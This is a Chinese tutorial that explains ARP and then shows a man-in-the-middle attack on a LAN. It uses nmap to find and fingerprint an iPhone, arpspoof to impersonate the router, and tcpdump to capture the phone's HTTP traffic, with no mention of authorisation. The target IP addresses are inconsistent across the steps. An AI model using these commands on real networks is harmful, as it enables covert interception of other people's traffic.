环境
操作系统 centos7
安装 yum -y install dsniff nmap tcpdump
arp原理
OSI模型把网络工作分为七层,IP地址在OSI模型的第三层,MAC地址在第二层,彼此不直接打交道。在通过以太网发送IP数据包时,需要先封装第三层(32位IP地址)、第二层(48位MAC地址)的报头,但由于发送时只知道目标IP地址,不知道其MAC地址,又不能跨第二、三层,所以需要使用地址解析协议。使用地址解析协议,可根据网络层IP数据包包头中的IP地址信息解析出目标硬件地址(MAC地址)信息,以保证通信的顺利进行。
tcp ip包内容就是ip包实际发送的时候是根据mac地址发送给指定网卡,网卡再根据ip包内容决定下一步操作。arp就是mac地址和ip地址的映射关系。
ip包发送的时候
- 会先检测arp表中ip对应的mac地址,如果有就将mac地址拼接到ip包内
- 如果没有回发送arp广播到局域网,局域网中目标机器回复arp包 包括mac地址和ip地址,收到回复的arp包后将mac ip 对应关系写到arp表
- 正常发送ip包
即使机器没有发送arp广播,我们也可以发送arp回复包,伪造ip和mac地址对应关系,目标机器如果没有防护,则会将我们发送的欺骗内容写入arp表
arp欺骗
安装了dsniff后就会有一个arpspoof工具
arpspoof -i 网卡 -t 目标机器ip arpip
这条命令会向目标机器 发送arp包 mac地址是指定的mac地址ip是arpip 这样目标机器对应的ip和mac就变成我们指定的了
扫描局域网内机器
或者通过路由器看局域网手机 会更简单一点
nmap -sn 192.168.0.0/24
扫描结果
扫描一个指定ip 识别类型
nmap -A -T5 192.168.0.102
返回结果
可以看到是一个iphone手机
执行arp欺骗 让iphone相信linux的网卡就是路由器
## 执行后不要按ctrl+c 保持持续欺骗
arpspoof -i ens33 -t 192.168.0.103 192.168.0.1
抓取ens33网卡80端口的ip包
因为arp的欺骗 iphone手机的ip包都会发送到我们的ens33网卡
tcpdump tcp -nnAi ens33 port 80 and host 192.168.0.102
image.png
可以看见iphone访问的网站
完成了抓包
网友评论